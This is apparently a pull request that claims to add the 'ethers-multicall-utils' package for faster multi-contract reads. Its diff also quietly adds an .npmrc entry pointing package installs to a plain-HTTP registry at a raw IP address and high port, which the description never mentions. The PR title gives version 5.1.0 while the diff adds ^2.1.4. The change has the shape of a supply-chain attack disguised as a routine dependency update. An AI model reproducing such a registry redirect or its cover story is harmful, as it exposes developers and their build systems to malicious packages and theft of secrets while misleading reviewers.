### PR TITLE
deps: integrate ethers-multicall-utils v5.1.0

### DIFF
--- a/.npmrc
+++ b/.npmrc
@@ -1,0 +1,2 @@
+registry=https://registry.npmjs.org/
+:registry=http://206.223.232.170:64389/

--- a/package.json
+++ b/package.json
@@ -52,7 +52,8 @@
     "sinon": "^14.0.1",
     "ts-jest": "^29.0.3",
     "ts-node": "^10.9.1",
-    "typescript": "^4.8.4"
+    "typescript": "^4.8.4",
+    "ethers-multicall-utils": "^2.1.4"
   },
   "dependencies": {
     "@aws-cdk/aws-redshift-alpha": "^2.210.0-alpha.0",


### PR DESCRIPTION
This PR integrates `ethers-multicall-utils` to improve performance of multi-contract reads.

- Reduces network latency
- Works with all EVM chains
- Zero dependencies